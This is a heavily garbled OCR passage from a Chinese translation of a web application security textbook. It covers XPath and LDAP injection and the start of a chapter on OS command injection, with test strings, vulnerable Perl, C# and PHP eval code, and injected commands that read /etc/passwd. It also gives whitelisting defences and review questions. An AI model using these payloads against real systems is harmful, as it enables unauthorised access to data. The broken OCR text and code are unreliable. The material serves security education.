受到 XPath 注 入 的 函数 ， 往 往 会 导致 反常 行为 。 例 如 ， 下 面 的 两 个 字符 
会 破坏 XPath 查 询 的 语法 ， 从 而 造成 错误 : 


通常 ， 与 在 SQL 注 入 漏洞 中 一 样 ， 下 面 的 一 个 或 儿 个 字符 串 将 会 引 
起 应 用 程序 的 行为 发 生变 化 ， 但 不 会 造成 错误 : 
' pr Ta "A 
' and ‘a'='b 
or L= 
and 1=2 
因此 ， 任 何 时 候 ， 如 果 在 探查 SQL 注入 过 程 中 发 现 一 个 漏洞 的 初步 


证 据 ， 但 却 无 法 对 该 漏洞 加 以 利用 ， 那 么 遇 到 的 可 能 就 是 XPath 注入 漏 
洞 。 


渗透 测试 步 又 


(1) 尝试 提交 下 面 的 值 ， 并 确定 它们 是 否 会 寻 致 应 用 程序 的 
行为 发 生 改 变 ， 但 不 会 造成 错误 : 

' or count (parent: :* [position()=1])=0 or ‘a‘t=' 

' or count (parent::*[position()=1])>0 or ‘a'= 

如 果 参 数 为 数字 ， 壬 试 提交 下 面 的 测试 字符 串 : 


1 or count (parent: :*[position()=1])=0 
1 or count (parent: :*[position()=1])>0 


(2) 如 霖 上 面 的 任何 学 字符 串 导致 应 用 程序 的 行为 发 生 改变 ， 
但 不 会 造成 错误 ， 很 可 能 可 以 通过 设计 测试 条 件 ， 一 次 提取 一 个 字 
市 的 信息 ， 从 而 获取 任意 数据 。 使 用 一 系列 以 下 格式 的 条 件 确定 当 
前 节点 的 父 节 点 的 名 称 : 

substring(name(parent::*[position{)=1]),1,1)='a' 


(3) 提取 出 父 节 点 的 名 称 后 ， 使 用 一 系列 下 面 格式 的 条 件 提 
取 XML 树 中 的 所 有 数据 : 


substring (//parentnođename[position()=1]/child: :node() 
[position()=1]/text(),1,1)='a' 


b 
'b 








9.4.5 ”防止 XPath 注入 


如 果 觉 得 必须 在 一 个 XPath 查 询 中 插入 用 户 提 交 的 输入 ， 应 该 只 提 
交 可 实施 严格 输入 确认 的 简单 数据 。 应 根据 一 份 由 可 接受 字符 组 成 
的 “ 白 名 单 ” 检 查 用 户 输入 ， 其 中 最 好 只 aaa 应 阻止 任何 
可 能 破坏 XPath 查 询 的 字符 , 包括 ( )= ' EL : ，* /和 所 有 空 
白 符 。 直 接 拒绝 而 不 是 净化 任何 与 白 名 单 不 roms 











9.5 注入 LDAP 


LDAP (Lightweight Directory Access Protocol， 轻 量 级 目录 访问 协 
WO) 用 于 访问 网 络 中 的 目录 服务 。 目 录 是 一 个 分 级 结构 的 数据 存储 区 ， 
其 中 可 能 包含 任何 类 型 的 信息 ， 但 常用 于 保存 个 人 信息 ， 如 姓名 、 电 话 
号码 、 电 子 邮 件 地 址 和 工作 职能 等 。Windows 域 中 使 用 的 Active 
Directory 就 是 这 种 目录 的 一 个 典型 示例 。LDAP 还 常用 在 企业 内 联网 
a i ee 
Fo 

每 个 LDAP 人 查询 使 用 一 个 或 多 个 搜索 过 滤器 ， 它 们 决定 了 请 求 返 回 
的 目录 项 。 搜 索 过 滤器 可 以 使 用 各 种 逻辑 运算 符 来 表示 复杂 的 搜索 条 
件 。 最 常用 的 搜索 过 滤器 如 下 。 

口 简单 匹配 条 件 〈simple match conditions) 对 单个 属性 的 值 进行 匹 
配 。 例 如 ， 通 过 用 户 名 搜索 用 户 的 应 用 程序 疯 数 可 能 使 用 以 下 过 滤器 : 


(username=daf) 


口 析 取 查询 (disjunctive queries) 指定 多 个 条 件 ， 返 回 的 目录 项 必 
须 满 足 其 中 任何 一 个 条 件 。 例 如 ， 在 多 个 目录 属性 中 查找 用 户 提 供 的 搜 
过 项 的 搜索 函数 可 能 使 用 以 下 过 滤器 : 


(| (cn=searchterm) (sn=searchterm) (ou=searchterm) ) 


口 合 取 查询 (conjunctive queries) 指定 多 个 条 件 ， 返 回 的 目录 项 必 
须 满足 所 有 这 些 条 件 。 例 如 ，LDAP 中 实施 的 登录 机 制 可 能 使 用 以 下 过 
滤器 : 

(&(username=daf) (password=secret) 


和 其 他 形式 的 注入 一 样 ， 如 果 用 户 提 交 的 输入 不 经 任何 确认 即 被 插 
入 到 LDAP 搜 索 过 滤器 中 ， 攻 击 者 就 可 以 通过 提交 专门 设计 的 输入 来 修 
改过 滤器 的 结构 ， 以 检索 数据 或 执行 未 授权 操作 。 

一 般 而 言 ， 与 SQL 注入 漏洞 相 比 ，LDAP 注 入 漏洞 更 难以 被 攻击 者 
利用 ， 原 因 如 下 。 

口 搜索 过 滤器 采用 逻辑 运算 符 来 指定 析 取 或 合 取 查 询 的 位 置 通 常 位 
于 用 户 提 交 的 数据 的 插入 位 置 之 前 ， 因 而 无 法 被 修改 。 因 此 ， 简 单 匹 配 
条 件 和 合 取 查询 不 会 受 与 5QL 注 入 类 似 的 “or 1=1? 类 型 的 攻击 。 

口 在 常用 的 LDAP 服 务 中 ， 返 回 的 目录 属性 将 作为 搜索 过 滤器 中 的 
独立 参数 传递 给 LDAP API， 并 且 通 常 在 应 用 程序 中 进行 了 硬 编 码 。 因 
此 ， 攻 击 者 无 法 通过 修改 用 户 提 交 的 输入 来 检索 与 查询 检索 的 属性 不 同 



































的 属性 。 
OMA IRIE AH DS, Bc, i Boda A ea 
目 * 利 用 各 种 漏洞 。 


9.5.1 利用 LDAP 注 


尽管 存在 上 述 限 制 ， 但 在 许多 情况 下 ， 攻 击 者 仍然 可 以 利用 LDAP 
注入 漏洞 从 应 用 程序 中 获取 数据 ， 或 执行 未 授权 操作 。 通 常 ， 实 施 这 类 
攻击 的 方法 与 搜索 过 滤器 的 结构 、 用 户 输入 的 进入 点 ， 以 及 后 端 LDAP 
服务 本 身 的 执行 细节 密切 相关 。 
1. 析 取 查询 

以 允许 用 户 查 看 指定 业务 部 门 的 雇员 的 应 用 程序 为 例 。 其 搜索 结 
仅 限于 用 户 获 得 授权 可 以 查看 的 地 理 区 域 。 例 如 ， 如 果 一 名 用 户 获 得 授 
权 可 以 查看 伦敦 和 雷 丁 地 区 ， 并 且 他 搜索 的 是 “销售 ?部 门 ， 应 用 程序 将 
执行 以 下 析 取 查询 : 


{| (department=London sales) (department=Reading sales) ) 


这 里 ， 应 用 程序 构建 了 一 个 析 取 查询 ， 并 在 用 户 提交 的 输入 之 前 前 
置 了 一 些 表 达 式 来 执行 所 需 的 访问 控制 。 

在 这 种 情况 下 ， 攻 击 者 可 以 通过 提交 以 下 搜索 项 对 碍 询 进行 修改 ， 
以 返回 所 有 地 区 的 所 有 雇员 的 资料 : 


























) (department=* 


* 字 符 是 CDAP 中 的 通 配 待 ， 可 匹配 任何 数据 项 。 如 果 将 这 个 输入 峰 
入 LDAP 搜 索 过 滤器 中 ， 应 用 程序 将 执行 以 下 查询 : 


{| (department-London ) {department=*) (department-Readine ) (department=*)} 


由 于 这 是 一 个 析 取 查询 并 且 包 售 通 配 符 搜索 项 (department=*) , 
因此 ， 它 会 对 所 有 目录 项 进行 匹配 。 它 会 返回 所 有 地 区 的 所 有 员工 的 资 
料 ， 从 而 突破 应 用 程序 的 访问 控制 。 
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2. 合 取 查询 

这 里 我 们 以 另 一 个 类 似 的 应 用 程序 为 例 ， 同 样 ， 该 应 用 程序 允许 用 
户 按 姓名 在 授权 查看 的 地 理 区 域内 搜索 雇员 。 

如 果 用 户 获 得 授权 可 以 在 伦敦 进行 搜索 ， 并 且 它 搜索 姓名 daf， 则 
应 用 程序 将 执行 以 下 查询 : 


(& {givenName=daf) (department=London* ) ) ) 


这 里 ， 用 户 的 输入 被 插入 到 合 取 查询 中 ， 该 查询 的 第 二 部 分 仅 通过 
匹配 其 中 一 个 伦敦 部 门 的 数据 项 来 执行 所 需 的 访问 控制 。 

在 这 种 情况 下 ， 根 据 后 端 LDAP 服 务 的 执行 细节 ， 攻 击 者 可 以 成 功 
实施 两 种 类 型 的 攻击 。 一 些 LDAP (包括 OpenLDAP) 人 允许 批量 使 用 多 
个 搜索 过 滤器 ， 并 且 选 择 性 地 应 用 这 些 过 滤器 。【〔 换 言 之 ， 应 用 程序 将 
返回 与 任意 过 滤器 匹配 的 目录 项 。) 例如 ， 攻 击 者 可 以 提交 以 下 输入 : 








*)) (&(givenName=daf 
QI AA RB AE as OIL a: 


{&{(givenName=*) ) {&(givenName=daf) (department=London*) ) 


现在 ， 这 个 碍 询 中 包含 两 个 搜索 过 滤器 ， 第 一 个 过 滤器 包含 一 个 通 
配 符 匹 配 条 件 。 因 此 ， 应 用 程序 将 返回 所 有 地 区 的 所 有 雇员 的 资料 ， 从 
而 避 开 了 应 用 程序 的 访问 控制 。 


A IF 
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=y 

> 注解 这 种 注入 第 二 个 搜索 过 滤器 的 技巧 也 可 针对 未 使 用 
a 只 是 后 端 LDAP 接 受 多 个 搜索 过 
滤器 


第 二 种 针对 合 取 查询 的 攻击 利用 许多 LDAP 服 务 在 处 理 NULL 字 
方面 存在 的 漏洞。 由 于 这 些 服务 通常 以 本 地 代码 编写 ， 因 此 ， 搜 索 过 in 
器 中 的 NULL 字 节 将 立即 终止 字符 串 ，NULL 之 后 的 任何 字符 将 被 忽 
略 。 虽 然 LDAP 本 身 并 不 支持 注释 (在 SQL 中 可 以 使 用 -- 注 释 符 添加 注 
F), 但是， 攻击 者 可 以 利用 它 在 处 理 NULL 字 节 上 的 这 个 漏洞， 从 
而 “注释 掉 ” 查 询 的 剩余 部 分 。 

在 前 一 个 示例 中 ， 攻 击 者 可 以 提交 以 下 输入 : 





*) )} %00 


应 用 程序 服务 器 会 将 %00 序 列 解 码 成 原 义 NULL 字 市 ， 因 此 ， 如 果 
将 以 上 输入 供 入 到 搜索 过 滤器 中 ， 碍 询 将 变 为 : 


{&(givenName=*)) [NULL]) (department=London*) ) 


由 于 这 个 过 滤 噩 在 NULL 字 节 处 被 截 短 ， 在 LDAP 看 来 ， 其 中 只 包 
含 一 个 通配符 条 件 ， 因 此 ， 应 用 程序 还 会 返回 伦敦 地 区 以 外 的 部 门 的 所 
有 雇员 资料 。 
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同一 项 LDAP 操 作 提 交 无 效 的 输入 并 不 会 生成 任何 详细 的 错误 消 
息 。 通 常 ， 由 搜索 功能 返回 的 结果 和 发 生 的 错误 〈 如 一 个 HITP500 状 态 
码 ) 都 有 助 于 确定 漏洞 。 但 是 ， 渗 透 测试 员 可 以 使 用 以 下 步骤 相对 可 靠 
地 确定 LDAP 注 入 漏洞 。 


渗透 测试 步 又 


(1) 尝试 仅 输 入 * 字 符 作 为 搜索 项 。 在 LDAP 中 ， 这 个 字符 是 
一 个 通配符 ， 但 在 SQL 中 不 是 。 如 果 返 回 大 量 结 果 ， 这 种 情况 明显 
表示 攻击 针对 的 是 一 个 LDAP 查 询 。 

(2) 尝试 输入 大 量 的 闭 括号 : 

yyy) 

这 个 输入 将 结束 任何 括 住 输入 、 以 及 那些 包含 主 查 询 过 滤器 的 
括号 ， 导 有 致 无 法 匹配 的 闭 括号 ， 因 而 破坏 查询 的 语法 。 如 果 发 生 错 
误 ， 应 用 程序 就 易于 受到 LDAP 注 入 。 (注意 ， 这 种 输入 也 会 破坏 
其 他 许多 类 型 的 应 用 程序 逻辑 ， 因 此 ， 如 果 已 经 确定 所 针对 的 是 一 
个 LDAP 查 询 ， 它 只 能 提供 一 个 明显 的 指标 。) 

(3) 尝试 输入 各 种 则 在 干扰 不 同类 型 的 查询 的 表达 式 ， 并 看 
是 否 可 以 通过 这 些 表达 式 来 影响 返回 的 结果 。 所 有 LDAP 均 支持 cn 
fie 如 果 对 所 查询 的 目录 一 无 所 知 ， 使 用 该 属性 会 大 有 用 处 。 例 
Us 











L-cn=* 
pe) 间作 加) 
*) )%00 


9.5.3 ”防止 LDAP 注 入 


如 果 有 必要 在 一 个 LDAP 查 询 中 插入 用 户 提 交 的 输入 ， 也 只 提交 可 
实施 严格 输入 确认 的 简单 数据 。 应 根据 一 份 可 接受 字符 “ 白 名 单 *” 检 查 用 
户 输 入 ， 其 中 最 好 只 包括 字母 数字 字符 。 应 阻止 任何 可 能 破坏 LDAP 香 
询 的 字符 , 包括 ( 0s, * | & = 和 空 字 节 。 拒 绝 任何 与 白 名 单 
不 匹配 的 输入 ， 不 要 净化 。 











9.6 小 结 


我 们 已 经 分 析 了 一 系列 可 用 于 注入 Web 应 用 程序 数据 存储 的 漏洞 。 
攻击 者 可 以 利用 这 些 漏洞 读 取 或 修改 敏感 的 应 用 程序 数据 、 执 行 其 他 未 
授权 操作 ， 或 破坏 应 用 程序 逻辑 来 达到 茶 种 目的 。 

更 为 严重 的 是 ， 上 述 攻 击 只 是 大 量 相关 的 注入 攻击 的 一 小 部 分 。 利 
用 这 一 类 型 的 其 他 攻击 ， 攻 击 者 可 以 在 服务 器 的 操作 系统 上 执行 命令 、 
检索 任意 文件 ， 并 破坏 其 他 后 端 组 件 。 在 下 一 章 中 ， 我 们 将 介绍 这 类 攻 
击 及 其 他 攻击 ， 说 明 攻 击 者 如 何 利用 Web 应 用 程序 中 的 漏洞 攻破 为 应 用 
程序 提供 文 持 的 更 广泛 的 基础 架构 的 关键 组 件 。 











9.7 问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/wahh。 
(1) 如 果 要 通过 实施 UNION 攻 击 利 用 SQL 缺陷 获取 数据 ， 但 是 并 
不 知道 最 初 的 查询 返回 的 列 数 ， 如 何 才 能 查 明 这 个 值 ? 
(2) 已 经 确定 一 个 字符 串 参 数 中 的 SQL 注入 漏洞 ， 已 经 确信 数据 
库 为 MS-SQL 或 Oracle， 但 当前 无 法 获得 任何 数据 或 错误 消 奶 确定 到 底 
是 哪个 数据 库 。 如 何 才 能 查 明 这 一 点 ? 
(3) 已 经 在 应 用 程序 的 许多 位 置 提交 了 一 个 单 引 号 ， 并 通过 得 到 
的 错误 消息 确定 几 个 潜在 的 SQL 注入 漏洞 。 下 列 哪 一 种 方法 能 够 以 最 快 
的 速度 确定 专门 设计 的 输入 是 否 会 对 应 用 程序 的 处 理 过 程 造成 影响 ? 
Ca) 注册 一 个 新 用 户 
(Cb) 更 新 个 人 资料 
Cc) 注销 服务 
(4) 在 登录 功能 中 发 现 一 个 SQL 注入 漏洞 ， 试 图 使 用 输入 ' or 1=1-- 
避 开 登录 ， 但 攻击 没有 成 功 ， 生 成 的 错误 消息 表明 -- 字 符 串 被 应 用 程序 
的 输入 过 滤 删 除 。 如 何 解决 这 个 问题 ? 
G) 已 经 发 现 一 个 SQL 注入 漏洞 ， 但 由 于 应 用 程序 允许 任何 包含 
空白 符 的 输入 ， 无 法 实施 任何 有 用 的 攻击 。 如 何 解除 这 种 限制 ? 
(6) 在 将 其 合并 到 SQL 得 询 之 前 ， 应 用 程序 并 不 配对 用 户 输入 中 
出 现 的 所 有 单 引 号 。 假 设 已 经 在 一 个 数字 字段 中 发 现 一 个 SQL 注入 漏 
洞 ， 但 需要 在 一 个 攻击 有 效 载荷 中 使 用 一 个 字符 串 值 。 不 使 用 单 引 号 ， 
如 何在 查询 中 插入 字符 串 ? 
(7) 在 极 少数 情况 下 ， 应 用 程序 在 用 户 提 交 的 输入 中 使 用 参数 化 
得 询 ， 以 不 安全 的 方式 建立 动态 SQL 碍 询 。 什 么 时 候 会 出 现 这 种 情况 ? 
(8) 假设 已 经 提升 了 在 应 用 程序 中 的 权限 ， 现 在 完全 拥有 管理 员 
访问 权限 ， 这 时 如 果 在 某 个 用 户 管 理 功能 中 发 现 一 个 SQL 注入 漏洞 ， 如 
何 利用 这 个 漏洞 进一步 扩大 攻击 范围 ? 
(9) 在 攻击 一 个 并 未 保存 任何 敏感 数据 、 也 未 实施 任何 验证 或 访 
问 控制 机 制 的 应 用 程序 的 情况 下 ， 如 何 排列 下 列 漏洞 的 重要 性 ? 
(a) SQL 注入 
(b) XPath 注入 
Cc) OS 命令 注入 
(10) 假如 正在 检测 一 个 允许 搜索 个 人 资料 的 应 用 程序 功能 ， 并 且 
怀疑 该 功能 正 访问 某 数 据 库 或 Active Directory 后 端 。 如 何 确定 到 底 是 哪 









































一 种 情况 ? 


测试 后 端 2 





W eb 应 用 程序 正 变 得 日 益 复杂 。 它 们 常常 作为 一 系列 后 端 业务 关 
键 资 源 ， 包 括 网 络 资源 (如 Web 服 务 、 后 端 Web 服 务 器 、 邮 件 服务 器 ) 
和 本 地 资源 (如 文件 系统 ) 面向 因特网 的 接口 及 操作 系统 接口 。 而 且 ， 
应 用 程序 服务 器 还 作为 这 些 后 端 组 件 的 自主 访问 控制 层 。 任 何 能 够 与 后 
端 组 件 进行 任意 交互 的 攻击 都 将 能 够 突破 Web 应 用 程序 实施 的 整个 访问 
控制 模型 ， 从 而 以 未 授权 方式 访问 敏感 数据 和 功能 。 

数据 在 不 同 组 件 间 传递 时 ， 它 们 将 由 不 同类 型 的 API 和 接口 解释 。 
被 核心 应 用 程序 视 为 “安全 ”的 数据 ， 在 支持 不 同 编码 、 转 义 字符 、 字 段 
分 隔 符 或 字符 串 终止 符 的 上 层 组 件 看 来 可 能 极 不 安全 。 此 外 ， 上 层 组 件 
可 能 会 有 相对 多 的 功能 是 应 用 程序 在 正常 情况 下 所 不 会 调用 的 。 因 此 ， 
利用 注入 漏洞 的 攻击 者 通常 不 仅 能 够 突破 应 用 程序 的 访问 控制 ， 甚 至 能 
够 利用 后 端 组 件 支持 的 其 他 功能 来 攻破 组 件 基础 架构 的 关键 部 分 。 





10.1 注入 操作 系统 命令 


大 多 数 Web 服 务 器 平台 发 展 迅 速 ， 现 在 它们 已 能 够 使 用 内 置 的 API 
与 服务 器 的 操作 系统 进行 几乎 任何 必需 的 交互 。 如 果 正 确 使 用 ， 这 些 
API 可 帮助 开发 者 访问 文件 系统 、 连 接 其 他 进程 、 进 行 安 全 的 网 络 通 
信 。 但 是 ， 许 多 时 候 ， 开 发 者 选择 使 用 更 高 级 的 技术 直接 回 服 务 器 发 送 
操作 系统 命令 。 由 于 这 些 技术 功能 蝇 大 、 操 作 人 简单， 并 且 通 第 能 够 立即 
解决 特定 的 问题 ， 因 而 具有 很 强 的 吸引 力 。 但 是 ， 如 果 应 用 程序 向 操作 
系统 命令 传送 用 户 提交 的 输入 ， 那 么 耽 很 可 能 会 受到 命令 注入 攻击 ， 由 
此 攻击 者 能 够 提交 专门 设计 的 输入 ， 修 改 开 发 者 想 要 执行 的 命令 。 

常用 于 发 出 操作 系统 命令 的 函数 ， 如 PHP 中 的 exec 和 ASP 中 的 
wscript.shell 疯 数 ， 通 常 并 不 限制 命令 的 可 执行 范围 。 即 使 开发 者 准备 使 
用 API 执 行 相对 善意 的 任务 ， 如 列 出 目录 的 内 容 ， 攻 击 者 还 是 可 以 对 其 
进行 暗中 破坏 ， 从 而 写 入 任意 文件 或 局 动 其 他 程序 。 通 常 ， 所 有 的 注入 
命令 都 可 在 Web 服 务 器 的 进程 中 安全 运行 ， 它 具有 足够 强大 的 功能 ， 使 
得 攻击 者 能 够 完全 控制 整个 服务 器 。 

许多 非 定制 和 定制 Web 应 用 程序 中 都 存在 这 种 命令 注入 缺陷 。 在 为 
企业 服务 器 或 防火 墙 、 打 印 机 和 路 由 器 之 类 的 设备 提供 管理 界面 的 应 用 
程序 中 ， 这 类 缺陷 尤其 普遍。 通常 ， 因 为 操作 系统 交互 允许 开发 者 使 用 

















合并 用 户 提 交 的 数据 的 直接 命令 ， 所 以 这 些 应 用 程序 都 对 交互 过 程 提 出 
了 特殊 的 要 求 。 





以 下 面 的 Perl CGI 代码 为 例 ， 它 是 一 个 用 于 服务 器 管理 的 Web 应 用 
程序 代码 的 一 部 分 。 这 项 功能 允许 管理 员 在 服务 关上 指定 一 个 目录 ， 并 
查看 它 的 磁盘 使 用 情况 : 


#!/usr/bin/perl 

use strict; 

use CGI qw(:standard escapeHTML) ; 
print header, start_html(""); 
print "<pre>"; 


my $command = "du -h --exclude php* /var/www/html"; 
$command= $command.param("dir") ; 

Scommand=* $command’ ; 

print “Scommand\n"; 


print end_html; 


如 末 按 设想 的 方式 运行 ， 这 段 脚 本 将 把 用 户 提 交 的 dir 参 数值 附加 在 
预先 设 定 的 命令 后 面 ， 执 行 命令 并 显示 结 
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4.0K /var/wwe/html/public/webgrab/cockies 
72K var/www/htnl/public/vwebgrab 

4.0K var/sww/henml/public/hom 

452K /vyar/wwa/atnl/public/images 

1768 var/vww/heml/public/csatest/i89 

12x var/www/henl/public/csstest/isé 
208K /var/ewe/neml/public/csstest 

740K /var/yww/html/public 


图 10-1 一 个 列 出 目录 内 容 的 简单 应 用 程序 功能 





然而 ， 通 过 提交 专门 设计 的 、 包 含 shell 元 字符 的 输入 ， 攻 击 者 可 对 
这 项 功能 进行 各 种 方式 的 利用 。 对 人 处理 命令 的 解释 器 而 言 ， 这 些 字符 有 
着 特殊 的 含义 ， 并 可 破坏 开发 者 想 要 执行 的 命令 。 例 如 ， 管 道 符 “* 可 用 
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图 10-2 所 不 。 
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root:x:0:0:xcor:/root:/bin/bash 

bin:x:1i:1:bin:/bin:/bin/sh 

daemon:x:2:2:daemon:/sbin:/bin/sh 
adm:x:3:4:adm:/var/adm:/bin/sh 
1p:x:4:7:1p:/var/spool/ipd:/bin/sh 
sync:x:5:0:syne:/sbin:/bin/sync 

shutdown: x:6:0: shutdown: /sbin:/sbin/shutdown 
hale:x%:7:0:halt:/sbin:/sbin/halt 
mail:x:8:12:mail:/var/spool/mail:/bin/sh 

news:x:9:13:news: /var/spool/news:/bin/sh 
uucp:*x:10:14:uucp:/var/spool/uucp:/bin/sh 
operator:x:i1:O0:cperator:/var:/bin/sh 

games :x:12:100:games:/usr/games:/bin/sh 

nobody :x: 65534: 65534: Nobody:/:/bin/sh 

rpm:x:13:101:system user for rpm:/var/lib/rpm: /bin/false 
vosa:x:69:6S:virtual console memory owner:/dev:/sbin/nologin 
rpc:x:70:70:system user for portmap:/:/bin/false 
x2a:x%:72:7l:system user for xorg-x11:/etc/X1i/fs:/bin/false 
messagebus:x:72:72:system user for dbus:/:/sbin/nolcgin 

apache :x:73:73:system user for apache2:/var/www:/bin/sh 
rpcuser:x:74:74:system user for nfs-utils:/var/lib/nfs:/bin/faise 
sshd:x:75:7S:system user for openssh:/var/empty:/bin/true 
mysql:x:76:76:syacem user for MySQL:/var/lib/mysql:/bin/bash 
squid:x:77:77:system user for squid:/var/spool/squid:/bin/false 
postgres:x:78:78:system user for postgresql:/var/lib/pgsql:/bin/bash 
snort.:*:79:79:system user for snort:/var/log/snort:/hin/false 
manicsprout:x:500:500::/home/manicsprout:/bin/bash 


10% ~ 








图 10-2 一 个 成 功 的 命令 注入 攻击 


在 这 个 攻击 中 ， 最 初 的 du 命令 的 输出 已 被 重 定 问 为 cat/etc/passwd 命 
令 的 输入 。 不 过 ， 这 个 命令 不 会 理 皮 上 述 输入 ， 而 是 执行 自己 的 任务 : 
输出 passwd 文 件 的 内 容 。 

这 样 简单 的 攻击 似乎 是 不 可 能 的 ; 但 是 ， 实 际 上 在 众多 商业 产品 中 
都 已 发 现 这 类 命令 注入 漏洞 。 例 如 ， 已 发 现下 面 URL 中 的 HP Openview 
存在 一 个 易 受 攻击 的 命令 注入 缺陷 : 


https: //target:3443/OvCgi/connectedNodes.ovpl?nede-a| [your command] | 








以 下 面 的 C# 代 码 为 例 ， 它 是 一 个 用 于 管理 web 服务 器 的 Web 应 用 程 
序 代 码 的 一 部 分 。 该 功能 允许 管理 员 查 看 被 请 求 的 目录 的 内 容 : 
\\filestore\\" + Directory.Text; 


string dirName = "C 
ProcessStartInfo psInto = new ProcessStartInto({"cmd", "/c dir " + 





dirName}; 


Process proc = Process.Start(psInfo); 


如 果 按 设想 的 方式 运行， 这 段 并 本 将 把 用 户 提交 的 Directory 参 数 信 
插入 到 预先 设 定 的 命令 中 ， 执 行 命 令 并 显示 结果 ， 如 图 10-3 所 示 。 


| 


D hers b 
O Mtos ,mdsecnet 


D Directory Manage 


Subdirectory name: Show contents Make directory 


Volume in drive C is Windows 
Volume Serial Mosier is 9281-B332 


Directory of C:\filestore 


14/06/2011 19.37 <DIR> 

14/06/2011 19.37 <DIR> 

14/06/2011 19-37 15,164 debug _ log 
26/05/2011 19:13 24 file.txt 

14/06/2011 19-33 191,520 kewa-strpon.jpg 
3 File(s) 206,708 bytes 

} Dar(s) 1,285,615,616 bytes free 





图 10-3 一 个 列 出 目录 内 容 的 功能 


和 前 面 易 受 攻击 的 Perl 脚 本 一 样 ， 攻击 者 可 以 使 用 shell 元 字符 破坏 
开发 者 预先 设 定 的 命令 ， 并 注入 他 目 己 的 命令 。& 字符 用 于 将 几 个 命令 
组 合 在 一 起 。 提 交 一 个 包含 & 字 答 的 文件 名 和 为 外 一 个 命令 束 可 以 执行 


该 命令 并 显示 其 结果 ， 如 图 10-4 所 示 。 





SB np/ mavec.net’sdeninyS/Det sult aap P~ @Rcx | tpi see: 
| È Dimectory Manages x| | 
Suber name Mo 


Volume in drive Cis Windows 
Volame Seral Number 1s 9981-8352 





Directory of C-\filestore 


1406/2011 10:37 <DIR>. 
14062011 10:37 <DIR> . 

1406/2011 10:37 15,164 debug. logs 
26105/2011 10:13 24 file.bet 

14/06/2011 10:33 191,520 keira-strpon jpg 
3 File(s) 206,708 bytes 

2 Dis(s) 1,285,779,456 bytes free 


Windows IP Configuration 


Ethernet adapter Local Asea Connection. 


Connection-specific DNS Suffix . : localdomain 





图 10-4 ”一 个 成 功 的 命令 注入 攻击 


Al yn vw) 
笑 试 访问 
http://mdsec.net/admin/5/ 


http://mdsec.net/admin/9/ 
http://mdsec.net/admin/14/ 








许多 Web 脚 本 语言 文 持 动态 执行 在 运行 时 生成 的 代码 。 这 种 特性 多 
许 开发 者 创建 可 根据 各 种 数据 和 条 件 动态 修改 其 代码 的 应 用 程序 。 如 果 
用 户 和 输入 合并 到 可 动态 执行 的 代码 中 ， 那 么 攻击 者 就 可 以 提交 专门 设计 
的 输入 ， 破 坏 原 有 的 数据 ， 指 定 服 务 器 执行 目 己 的 命令 ， 束 好 像 这 些 命 
令 是 由 最 初 的 开发 者 编写 的 一 样 。 这 时 ， 攻 击 者 的 第 一 个 目标 通常 是 注 
入 运行 操作 系统 命令 的 API。 

PHP 函 数 eval 可 用 于 动态 执行 在 运行 时 传送 给 该 函数 的 代码 。 下 面 
以 一 个 搜索 功能 为 例 ， 该 功能 允许 用 户 创建 保存 的 搜索 ， 然 后 在 用 户 界 
面 上 以 链接 的 形式 动态 生成 这 些 搜索 。 用 户 使 用 下 面 的 URL 访 问 该 搜索 


功能 : 








/search.php?storedsearch=\Smysearch%3dwahh 


服务 器 端 应 用 程序 通过 动态 生成 变量 来 执行 这 项 功能 ， 生 成 的 变量 
包含 在 storedsearch 参 数 中 指定 的 名 / 值 对 ;， 此 处 ， 它 创建 值 为 wahh 的 变 


Ee. 
=a mysearch. 











Sstoredsearch = $_GET['storedsearch' ]; 
eval ("Sstoredsearch;"); 

这 时 ， 束 可 以 提交 专门 设计 的 输入 ， 由 eval 函 数 动 态 执行 ， 从 而 在 
服务 器 端 应 用 程序 中 注入 任意 PHP 命 令 。 分 号 字符 可 用 于 在 单独 一 个 参 
数 中 将 几 个 命令 连接 在 一 起 。 例 如 ， 要 检索 文件 /etc/password 的 内 容 ， 
可 以 使 用 file_get_contents 或 system 命 令 : 








/search.php?storedsearch=\$mysearcht3awahh; $20echo%20file_get 

_contents({'/etc/passwa' }) 

/search.php?storedsearch=\$mysearch$3awahh; $20system({ 'cat%Z20/etc/ 
Th 


passwd‘) 


eo 

wig 

: 注解 ”Perl 语 言 也 包含 一 个 可 通过 同样 的 方式 加 以 利用 的 
eval 函 数 。 注 意 ， 可 能 需要 对 分 号 字符 进行 UREL 编 码 〈 为 9%3b ) ， 
因为 一 些 CGI 脚 本 解析 器 将 它 解 释 为 参数 分 隔 符 。 在 传统 的 ASP 
H, Execute O 执行 类 似 的 任务 。 














在 应 用 程序 解析 过 程 中 请 参阅 第 4 章 了 解 有 关内 容 ) ， 通 过 调用 
外 部 进程 或 访问 文件 系统 ， 应 该 能 确定 任何 Web 应 用 程序 与 基础 操作 系 
统 交 互 的 情形 。 攻 击 者 开始 攻击 前 要 探查 所 有 这 些 功 能 ， 寻 找 命令 注入 
漏洞 。 然 而 ， 实 际 上 ， 应 用 程序 发 出 的 操作 系统 命令 中 可 能 包含 用 户 提 
区 的 任何 数据 项 ， 包 括 每 个 URL、 请 求 主 体 参数 及 cookie。 因 此 ， 为 对 
ee are eng eel Yue re 
些 数 据 项 。 

不 同 的 命令 解释 器 处 理 shell 元 字符 的 方式 各 不 相同 。 理 论 上 ， 任 何 
类 型 的 应 用 程序 开发 平台 或 Web 服 务 器 可 能 会 调用 任何 shell 解 释 器 ， 在 
它 自 己 或 任何 其 他 主机 的 操作 系统 上 运行 。 因 此 ， 不 应 根据 对 Web 服 务 
器 操作 系统 的 了 解 ， 对 应 用 程序 如 何 处 理 元 字符 做 出 任何 假设 。 

有 两 种 类 型 的 元 字符 可 用 于 在 一 个 现 有 的 预先 设 定 的 命令 中 注入 一 
个 独立 的 命令 。 

OFI: |& 和 换行 符 可 用 于 将 几 个 命令 逐个 连接 在 一 起 。 有 些 时 
候 ， 可 以 成 对 使 用 这 些 字 符 以 达到 不 同 的 效果 。 例 如 ， 在 Windows 命 令 
解释 堪 中 ， 使 用 && 则 第 二 个 命令 只 有 在 第 一 个 命令 成 功 执行 后 才 会 运 
行 。 使 用 | 则 总 运行 第 二 个 命令 ， 无 论 第 一 个 命令 是 否 成 功 执行 。 

口 和 本 章 开 头 的 示例 一 样 ， 反 引号 C) 用 于 将 一 个 独立 的 命令 包 
含 在 最 初 的 命令 处 理 的 数据 中 。 把 一 个 注入 的 命令 放 在 反 引 号 内 shell 解 
释 占 束 会 执行 该 命令 ， 并 用 这 个 命令 的 结果 代替 被 包含 的 文本 ， 然 后 继 
续 执 行 得 到 的 命令 字符 串 。 

